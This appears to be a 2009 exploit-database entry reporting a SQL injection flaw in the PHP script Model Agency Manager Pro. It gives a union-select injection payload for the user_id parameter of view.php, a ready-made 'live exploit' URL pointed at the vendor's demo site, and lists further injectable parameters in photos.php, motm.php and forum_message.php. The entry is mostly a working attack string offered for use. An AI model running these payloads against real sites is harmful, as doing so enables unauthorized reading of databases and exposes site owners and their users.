Model Agency Manager Pro (user_id) SQL Injection Vulnerability

2009-09-09T00:00:00
ID 1337DAY-ID-5739
Type zdt
Reporter R3d-D3v!L
Modified 2009-09-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Model Agency Manager Pro (user_id) SQL Injection Vulnerability
==============================================================


[~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
[+]
[~] Vendor: www.phpmodelagencyscript.com
[+]
[+] Software: Model Agency Manager PRO
[+]
[+] Date: 7.9.2009
[+]
[+] Home: CL0S3D


[+] Exploit:

[+] XxX/view.php?user_id= EV!L !NJECT
[+] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[+] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[+]MORE ER0RR:
photos.php?user_id=((я3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))

##################################################################




#  0day.today [2018-02-20]  #